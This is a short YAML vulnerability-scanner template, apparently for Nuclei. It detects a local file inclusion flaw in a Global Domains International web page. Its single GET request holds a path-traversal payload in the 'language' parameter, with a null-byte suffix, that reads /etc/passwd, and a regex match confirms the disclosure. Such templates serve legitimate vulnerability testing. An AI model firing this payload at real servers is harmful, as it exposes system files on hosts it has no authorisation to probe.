id: global-domains-lfi

info:
  name: Global Domains International - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Global Domains International is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018020247
    - http://www.nic.ws
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: globaldomains,lfi,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
